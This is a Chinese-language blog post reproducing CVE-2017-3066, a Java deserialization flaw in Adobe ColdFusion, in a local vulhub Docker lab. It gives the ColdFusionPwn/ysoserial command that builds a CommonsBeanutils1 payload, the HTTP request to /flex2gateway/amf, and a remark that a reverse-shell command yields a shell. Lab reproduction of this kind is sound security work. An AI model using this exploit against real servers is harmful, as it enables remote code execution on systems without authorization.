Reproduction of CVE-2017-3066

  1. 前言
  2. 漏洞介绍
  3. 正文

前言

继续复现CVE漏洞
5c5977424262470b91df6257318adc2e.jpeg

漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

参考链接:

https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html

正文

启动漏洞环境

sudo docker-compose up -d

等待环境搭建完成后,访问http://127.0.0.1:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion。

k3aUIS.md.png

k3adPg.png

k3a02j.md.png

我们使用参考链接中的GitHub - codewhitesec/ColdFusionPwn: Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12工具来生成POC:

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

POC生成于poc.ser文件中,将POC作为数据包body发送给http://127.0.0.1:8500/flex2gateway/amf,Content-Type为application/x-amf:

POST /flex2gateway/amf HTTP/1.1
Host: 127.0.0.1.:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

k3aWiF.png

k3aIMR.png

进入容器中,发现/tmp/success已成功创建:
k3abdK.png
改成反弹shell的命令即可获取shell
转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Reproduction of CVE-2017-3066

本文作者:九世

发布时间:2019-02-01, 14:14:34

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/8129983d.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录